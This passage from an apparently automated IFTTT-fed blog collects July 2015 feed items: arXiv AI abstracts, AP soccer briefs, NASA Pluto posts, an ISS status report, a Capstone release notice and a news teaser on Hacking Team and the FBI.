chain?) ez_ipupdate callback --> time_elapsed: 1 Run DDNS by IP change: / 192.168.2.1 Burst DDNS Registration is denied: iptime -> now:26 Led Silent Callback Turn ON All LED /proc/sys/net/ipv4/tcp_syn_retries: cannot create - - -

Source: Gmail -> IFTTT-> Blogger

[FD] SAP Security Notes July 2015

[FD] Capstone disassembly engine 3.0.4 is out!

Greetings, We are excited to announce version 3.0.4 of Capstone disassembly framework! This stable release fixes some potential security issues in the core, so existing users are strongly recommended to upgrade. Summary of important changes in v3.0.4: - Fixed memory corruption bugs of X86, Arm, Mips, PowerPC & XCore architectures. - Properly handle some X86 instructions: OUT, SSE. - Improve Python binding with more installation options. - Improve cross compile for Android. More details are available at http://ift.tt/1LbSrjc (For those who do not know, Capstone is an open source multi-arch, multi-platform disassembly engine with homepage at http://ift.tt/MNrA0A) Thanks, Quynh

Source: Gmail -> IFTTT-> Blogger

why does it keep telling me i didnt pass an anonymous function into the each method call and i am ...

//Problem: It look gross in smaller browser widths and small devices //Solution: To hide the text links and swap them out with a more appropriate ...

from Google Alert - anonymous http://ift.tt/1MbI7b1
via IFTTT

Pluto Resolved

New Horizons has survived its close encounter with Pluto and has resumed sending back images and data. The robotic spacecraft reported back on time, with all systems working, and with the expected volume of data stored. Featured here is the highest resolution image of Pluto taken before closest approach, an image that really brings Pluto into a satisfying focus. At first glance, Pluto is reddish and has several craters. Toward the image bottom is a surprisingly featureless light-covered region that resembles an iconic heart, and mountainous terrain appears on the lower right. This image, however, is only the beginning. As more images and data pour in today, during the coming week, and over the next year, humanity's understanding of Pluto and its moons will likely become revolutionized. via NASA http://ift.tt/1MtRDn8

Wednesday, July 15, 2015

I have a new follower on Twitter

To Be Motivated...
Everyday is a second chance.

Following: 281 - Followers: 103

July 15, 2015 at 08:41PM via Twitter http://twitter.com/tobemtivated

Evidential relational clustering using medoids. (arXiv:1507.04091v1 [cs.AI])

In real clustering applications, proximity data, in which only pairwise similarities or dissimilarities are known, is more general than object data, in which each pattern is described explicitly by a list of attributes. Medoid-based clustering algorithms, which assume the prototypes of classes are objects, are of great value for partitioning relational data sets. In this paper a new prototype-based clustering method, named Evidential C-Medoids (ECMdd), which is an extension of Fuzzy C-Medoids (FCMdd) on the theoretical framework of belief functions is proposed. In ECMdd, medoids are utilized as the prototypes to represent the detected classes, including specific classes and imprecise classes. Specific classes are for the data which are distinctly far from the prototypes of other classes, while imprecise classes accept the objects that may be close to the prototypes of more than one class. This soft decision mechanism could make the clustering results more cautious and reduce the misclassification rates. Experiments in synthetic and real data sets are used to illustrate the performance of ECMdd. The results show that ECMdd could capture well the uncertainty in the internal data structure. Moreover, it is more robust to the initializations compared with FCMdd.

from cs.AI updates on arXiv.org http://ift.tt/1HvP3f6
via IFTTT

Solomonoff Induction Violates Nicod's Criterion. (arXiv:1507.04121v1 [cs.LG])

Nicod's criterion states that observing a black raven is evidence for the hypothesis H that all ravens are black. We show that Solomonoff induction does not satisfy Nicod's criterion: there are time steps in which observing black ravens decreases the belief in H. Moreover, while observing any computable infinite string compatible with H, the belief in H decreases infinitely often when using the unnormalized Solomonoff prior, but only finitely often when using the normalized Solomonoff prior. We argue that the fault is not with Solomonoff induction; instead we should reject Nicod's criterion.

from cs.AI updates on arXiv.org http://ift.tt/1RAjicy
via IFTTT

On the Computability of Solomonoff Induction and Knowledge-Seeking. (arXiv:1507.04124v1 [cs.AI])

Solomonoff induction is held as a gold standard for learning, but it is known to be incomputable. We quantify its incomputability by placing various flavors of Solomonoff's prior M in the arithmetical hierarchy. We also derive computability bounds for knowledge-seeking agents, and give a limit-computable weakly asymptotically optimal reinforcement learning agent.

from cs.AI updates on arXiv.org http://ift.tt/1HvP0zJ
via IFTTT

Revisiting AdaBoost for Cost-Sensitive Classification. Part I: Theoretical Perspective. (arXiv:1507.04125v1 [cs.CV])

Boosting algorithms have been widely used to tackle a plethora of problems. In the last few years, a lot of approaches have been proposed to provide standard AdaBoost with cost-sensitive capabilities, each with a different focus. However, for the researcher, these algorithms shape a tangled set with diffuse differences and properties, lacking a unifying analysis to jointly compare, classify, evaluate and discuss those approaches on a common basis. In this series of two papers we aim to revisit the various proposals, both from theoretical (Part I) and practical (Part II) perspectives, in order to analyze their specific properties and behavior, with the final goal of identifying the algorithm providing the best and soundest results.

from cs.AI updates on arXiv.org http://ift.tt/1RAjicr
via IFTTT

Revisiting AdaBoost for Cost-Sensitive Classification. Part II: Empirical Analysis. (arXiv:1507.04126v1 [cs.CV])

A lot of approaches, each following a different strategy, have been proposed in the literature to provide AdaBoost with cost-sensitive properties. In the first part of this series of two papers, we have presented these algorithms in a homogeneous notational framework, proposed a clustering scheme for them and performed a thorough theoretical analysis of those approaches with a fully theoretical foundation. The present paper, in order to complete our analysis, is focused on the empirical study of all the algorithms previously presented over a wide range of heterogeneous classification problems. The results of our experiments, confirming the theoretical conclusions, seem to reveal that the simplest approach, just based on cost-sensitive weight initialization, is the one showing the best and soundest results, despite having been recurrently overlooked in the literature.

from cs.AI updates on arXiv.org http://ift.tt/1HvP0zG
via IFTTT

Learning Action Models: Qualitative Approach. (arXiv:1507.04285v1 [cs.LG])

In dynamic epistemic logic, actions are described using action models. In this paper we introduce a framework for studying learnability of action models from observations. We present first results concerning propositional action models. First we check two basic learnability criteria: finite identifiability (conclusively inferring the appropriate action model in finite time) and identifiability in the limit (inconclusive convergence to the right action model). We show that deterministic actions are finitely identifiable, while non-deterministic actions require more learning power-they are identifiable in the limit. We then move on to a particular learning method, which proceeds via restriction of a space of events within a learning-specific action model. This way of learning closely resembles the well-known update method from dynamic epistemic logic. We introduce several different learning methods suited for finite identifiability of particular types of deterministic actions.

from cs.AI updates on arXiv.org http://ift.tt/1HvP3f1
via IFTTT

Massively Parallel Methods for Deep Reinforcement Learning. (arXiv:1507.04296v1 [cs.LG])

We present the first massively distributed architecture for deep reinforcement learning. This architecture uses four main components: parallel actors that generate new behaviour; parallel learners that are trained from stored experience; a distributed neural network to represent the value function or behaviour policy; and a distributed store of experience. We used our architecture to implement the Deep Q-Network algorithm (DQN). Our distributed algorithm was applied to 49 games from Atari 2600 games from the Arcade Learning Environment, using identical hyperparameters. Our performance surpassed non-distributed DQN in 41 of the 49 games and also reduced the wall-time required to achieve these results by an order of magnitude on most games.

from cs.AI updates on arXiv.org http://ift.tt/1V5aRVU
via IFTTT

Bayesian Modeling with Gaussian Processes using the GPstuff Toolbox. (arXiv:1206.5754v6 [stat.ML] UPDATED)

Gaussian processes (GP) are powerful tools for probabilistic modeling purposes. They can be used to define prior distributions over latent functions in hierarchical Bayesian models. The prior over functions is defined implicitly by the mean and covariance function, which determine the smoothness and variability of the function. The inference can then be conducted directly in the function space by evaluating or approximating the posterior process. Despite their attractive theoretical properties GPs provide practical challenges in their implementation. GPstuff is a versatile collection of computational tools for GP models compatible with Linux and Windows MATLAB and Octave. It includes, among others, various inference methods, sparse approximations and tools for model assessment. In this work, we review these tools and demonstrate the use of GPstuff in several models.

from cs.AI updates on arXiv.org http://ift.tt/MUKF9D
via IFTTT

Cuba advances with 1-0 Gold Cup win over Guatemala

CHARLOTTE, N.C. (AP) Maikel Reyes scored on a header in the 73rd minute to lift Cuba to a 1-0 win over Guatemala on Wednesday night in the CONCAF Gold Cup.

from FOX Sports Digital http://ift.tt/1J1pEw8
via IFTTT

Southampton signs Jordy Clasie from Feyenoord

SOUTHAMPTON, England (AP) Southampton has signed Jordy Clasie from Feyenoord, helping to fill the void left by midfielder Morgan Schneiderlin joining Manchester United.

from FOX Sports Digital http://ift.tt/1MuXWXt
via IFTTT

FIFA urged to let public figures lead change after scandals

GENEVA (AP) FIFA should let ''eminent public figures'' lead truly independent reform of the scandal-hit governing body, according to Transparency International.

from FOX Sports Digital http://ift.tt/1CI2Pft
via IFTTT

2 Cuban soccer players are no-shows at Gold Cup match in US

CHARLOTTE, N.C. (AP) The whereabouts of two Cuban national soccer team midfielders are unknown ahead of the squad's Gold Cup match vs. Guatemala.

from FOX Sports Digital http://ift.tt/1SnZJ24
via IFTTT

Rowdies of 2nd-tier NASL agree to contract with Freddy Adu

ST. PETERSBURG, Fla. (AP) The Tampa Bay Rowdies of the second-tier North American Soccer League have agreed to a contract with one-time phenom Freddy Adu.

from FOX Sports Digital http://ift.tt/1I3BJSn
via IFTTT

US soccer chief felt 'discomfort' during soccer proceedings

WASHINGTON (AP) U.S. Soccer Federation chief executive Dan Flynn said Wednesday he had no direct knowledge of bribery or kickbacks exchanged by FIFA officials but experienced moments of ''discomfort'' during meetings.

from FOX Sports Digital http://ift.tt/1OeQ6m4
via IFTTT

Anonymous gossip app Yik Yak will now let you post photos — but selfies aren't allowed

ScreenshotNo faces will be allowed in Yik Yak photosYik Yak, the anonymous, location-based social network that has been banned in some colleges ...

from Google Alert - anonymous http://ift.tt/1f4RXxB
via IFTTT

Anonymous on Twitter: "For context on recent events in #Denver: https://t.co/YUZq73O4xT ...

Retweets 51; Favorites 29; PATRIOT CAPO's world Chris Jo(an)hn Sherry Woodbeck Anonymous Amber Willis anarchoanthro Ξnemy of the State.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/621212861763862528&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFSatgelMdigE-gfTKu2EQPgd9Xew
via IFTTT

US soccer chief felt 'discomfort' during FIFA proceedings

WASHINGTON (AP) U.S. Soccer Federation chief executive and secretary general Dan Flynn said Wednesday he had no direct knowledge of bribery or kickbacks exchanged by FIFA officials but experienced moments of ''discomfort'' during meetings.

from FOX Sports Digital http://ift.tt/1V4vx0b
via IFTTT

Barcelona, Juventus players head UEFA Best Player shortlist

NYON, Switzerland (AP) Champions League finalists Barcelona and Juventus provide eight of the 10 players shortlisted for UEFA's Best Player in Europe Award for last season.

from FOX Sports Digital http://ift.tt/1HuOoKP
via IFTTT

ISS Daily Summary Report – 07/14/15

NanoRack Cubesat Deployer (NRCSD) Operations: Overnight there was an issue with a NRCSD deploy. Ground teams sent the command but only one door opened. Later during a night pass it was discovered that the CubeSat had deployed. Ground teams met and agreed to go forward with an additional deploy which was completed successfully. So far 8 of 16 Cubesats have been deployed. The complement consists of 14 Planet Lab Doves, 1 Arkyd-3 and 1 Centennial-1 satellite. Integrated Resistance and Aerobic Training Study (Sprint) Portable Pulmonary Function System (PPFS): Kelly set up the Portable PFS (Pulmonary Function System) power, data, front panel, and gas connections from a temporary stow deployed position and configured the PPFS Mixing Bag System (MBS) in preparation for the Sprint session scheduled for Wednesday. Sprint evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in International Space Station (ISS) crewmembers during long-duration missions. Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. Radiation Dosimetry Inside ISS-Neutrons (Radi-N): Kornienko handed Radi-N hardware to Kelly who then distributed the eight bubble detectors in the Columbus module and took closeout photos of the detectors in the deployed locations. The objective of this investigation is to better characterize the ISS neutron environment and define the risk posed to crewmembers’ health and provide the data necessary to develop advanced protective measures for future space flight. For each session, 8 detectors are initialized and deployed in predetermined locations for measurements: a set of 6 spectrometric detectors and two control detectors are placed on a wall of a ISS Segment. After 7 days the detectors are collected and read using the BUBBLE reader. Carbon Dioxide Removal Assembly (CDRA) Status: Node 3 (N3) CDRA: Today, ground controllers successfully commanded the N3 CDRA Air Selector Valve (ASV) 104 to position B. N3 CDRA was activated and is currently operational. Ground teams will continue to monitor ASV 104 performance and if necessary, a Removal & Replacement (R&R) will be planned later this week. Vozdukh was commanded to Mode 4 to assist with ppCO2 level management. Lab CDRA: Remote Power Controller Module (RPCM) LAD62B-A Remote Power Controller (RPC) 12, which powers the Lab CDRA valves, continues to experience overcurrent trips. Yesterday, the RPC stayed closed for over 7 hours before it tripped. Ground controllers are reviewing the data on the most recent trips prior to attempting to reclose the RPC. An R&R of the RPCM is being considered for next week to rule out the RPCM as the source of overcurrent trips. Extravehicular Activity (EVA) Battery Stowage Assembly (BSA) Battery Maintenance: Kelly initiated battery maintenance for Rechargeable EVA Battery Assembly (REBA), Helmet Light (HL), and Pistol Grip Tool (PGT) Batteries in the Battery Stowage Assembly (BSA) via the Battery Charger Assembly (BCA) using a discharge or an automated combination of charge and discharge cycling. This activity is in preparation for Russian EVA #41 currently scheduled for August 10. Today’s Planned Activities All activities are on schedule unless otherwise noted. 24-hour BP Monitoring (start) r/g 9337 Regeneration of БМП Ф2 Micropurification Cartridge (start) CASKAD. Manual Mixing in Bioreactor / r/g 9277 PILOT-T. Preparation for the experiment. / r/g 9335 WRS – Recycle Tank Fill MATRYOSHKA-R. Gathering and Initialization of Bubble-Dosimeter Detectors. / r/g 9327 PILOT-T. Experiment Ops. / r/g 9335 MATRYOSHKA-R. Handover of BUBBLE-dosimeters to USOS / r/g 9327 RADIN – Handover of detectors to USOS for deployment MATRYOSHKA-R. BUBBLE-dosimeter initialization and deployment. / r/g 9327 RADIN – Deployment of detectors WRS Water Sample Analysis PILOT-T. Experiment Ops. / r/g 9336 IDENTIFIKATSIYA. Copy ИМУ-Ц micro-accelerometer data to laptop / r/g 8732 PILOT-T. Experiment Ops. / r/g 9334 [Deferred] Start BSA Battery Maintenance Cycling Preparing for ЗУ2А Replacement (ЭА025М) in FGB r/g 9333 NANO – Installation of Ethernet cable [Deferred] Preparing for installation of ПН28-120 voltage converter r/g 9328 PILOT-T. Closeout Ops. / r/g 9334 [Deferred] PAO crew prep / r/g 9338 TV-PAO Event with Channel One and CNN r/g 9338 Semi-annual BRI cleaning (this includes cleaning filter, power supply unit, and fan unit). r/g 9329 TOCA Data Recording CWC Relocation Verification of ИП-1 Flow Sensor Position IMS Delta File Prep PAO Event Preventive Maintenance of FS1 Laptop (Cleaning and rebooting) / r/g 9331 Testing comm between modules. / r/g 9330 VHF1 Comm Test via US Ground Sites (AFRC, WHI) from SM SPRINT – Hardware Setup CASKAD. Manual Mixing in Bioreactor / r/g 9277 Regeneration of Micropurification unit (БМП) Ф2 cartridge (end) Completed Task List Items None Ground Activities All activities are on schedule unless otherwise noted. NanoRacks platform HD video Three-Day Look Ahead: Wednesday, 07/15: Sprint ops, VEG-01 plant thinning, JEM mesh cover-return grille cleaning, SSC 20 and 23 loading prep for 43S crew Thursday, 07/16: JEMRMS/CubeSat activities, SPHERES Slosh review, N3 CDRA leak check Friday, 07/17: SPHERES Slosh run QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up

from ISS On-Orbit Status Report http://ift.tt/1Linusc
via IFTTT

Sanfrecce Hiroshima leads J-League after beating Yamaga 6-0

TOKYO (AP) Sanfrecce Hiroshima moved into first place in the J-League after thrashing Matsumoto Yamaga 6-0 on Wednesday.

from FOX Sports Digital http://ift.tt/1I2fWdX
via IFTTT

Moggi cleared of defaming ex-Inter president Facchetti

MILAN (AP) Former Juventus executive Luciano Moggi has been cleared of defaming former Inter Milan president Giacinto Facchetti in a case related to the 2006 match-fixing scandal that shook Italian football.

from FOX Sports Digital http://ift.tt/1RySKbz
via IFTTT

1 million offered by anonymous fan for stolen Wizard of Oz ruby slippers

Now, an anonymous donor from Arizona is offering a $1 million reward for information on the shoes worn in The Wizard of Oz movie. In 2005 the ...

from Google Alert - anonymous http://ift.tt/1CDwPtt
via IFTTT

How Hacking Team and FBI planned to Unmask A Tor User

The huge cache of internal files recently leaked from the controversial Italian surveillance software company Hacking Team has now revealed that the Federal Bureau of Investigation (FBI) purchased surveillance software from the company. The leaked documents contains more than 1 Million internal emails, including emails from FBI agent who wanted to unmask the identity of a user of Tor, the

from The Hacker News http://ift.tt/1V2jQXO
via IFTTT

Polish coach Henry Kasperczak takes over at Tunisia

TUNIS, Tunisia (AP) Tunisia has appointed Henry Kasperczak as new coach, bringing the Pole back for a second spell in charge.

from FOX Sports Digital http://ift.tt/1gBIPBz
via IFTTT

Stoke signs Moha El Ouriachi from Barcelona

STOKE, England (AP) Stoke says it has completed the signing of Barcelona winger Moha El Ouriachi.

from FOX Sports Digital http://ift.tt/1RyDs6H
via IFTTT

I have a new follower on Twitter

Sara
Work,tweet & #followback in #tech #robots #IoT #machinelearning #design #philosophy #art ／＊Double-degree Engineer, Biorobotics @tohoku_univ, MSc @CentraleMars＊／
Japan 仙台市に留学生 - France

Following: 2792 - Followers: 2592

July 15, 2015 at 05:50AM via Twitter http://twitter.com/Sara_2190

Nigeria confirms Sunday Oliseh as new coach

ABUJA, Nigeria (AP) The Nigeria Football Federation has confirmed the appointment of former midfielder and captain Sunday Oliseh as the coach of the national team.

from FOX Sports Digital http://ift.tt/1HtUSJS
via IFTTT

New Horizons Passes Pluto and Charon

Will the New Horizons spacecraft survive its closest approach to Pluto and return useful images and data? Humanity will know in a few hours. Regardless of how well it functions, New Horizon's rapid speed will take it whizzing past Pluto and its moons today, with the time of closest approach being at 11:50 UT (7:50 am EDT). To better take images and data, though, the robotic spacecraft was preprogrammed and taken intentionally out of contact with the Earth until about 1:00 am UT July 15, which corresponds to about 9:00 pm EDT on July 14. Therefore, much of mankind will be holding its breath through this day, hoping that the piano-sized spacecraft communicates again with ground stations on Earth. Hopefully, at that time, New Horizons will begin beaming back new and enlightening data about a world that has remained remote and mysterious since its discovery 85 years ago. Featured above is a New Horizons composite image of the moon Charon (left) and Pluto (right) taken 3 days ago, already showing both worlds in unprecedented detail. via NASA http://ift.tt/1HsjikF

Latest YouTube Video

Saturday, July 18, 2015

Friday, July 17, 2015

JSONP Call

Thursday, July 16, 2015

Why were SIFT and SURF removed from the default install of OpenCV 3.0?

How do I get access to SIFT and SURF in OpenCV 3?

How do I use SIFT and SURF with OpenCV 3?

Summary

Wednesday, July 15, 2015